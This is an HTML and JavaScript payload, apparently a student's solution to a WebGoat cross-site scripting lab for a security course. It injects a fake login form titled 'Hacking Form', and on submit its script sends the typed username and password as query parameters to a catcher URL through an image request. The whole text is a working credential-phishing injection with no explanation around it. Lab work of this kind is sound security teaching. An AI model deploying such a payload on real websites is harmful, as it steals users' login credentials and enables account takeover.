<script>
    function hack() {
        XssImage = new Image;
        XssImage.src = "http://localhost:8090/WebGoat/catcher?PROPERTY=yes&phishingUsername="+document.forms[0].username.value+"&phishingPassword="+document.forms[0].password.value;
        alert("Success")
    }
</script>

<form name="phish">
    <br><br>    
    <H3>Hacking Form</H3>
    <br>
    <br>Enter Username:<br>
    <input type="text" id="ece568_2022w_user" name="username">
    <br>Enter Password:<br>
    <input type="password" id="ece568_2022w_pw" name="password">
    <input type="submit" id="ece568_2022w_submit" name="login" value="login" onclick="hack()">
    <br>
</form>
<br><br>
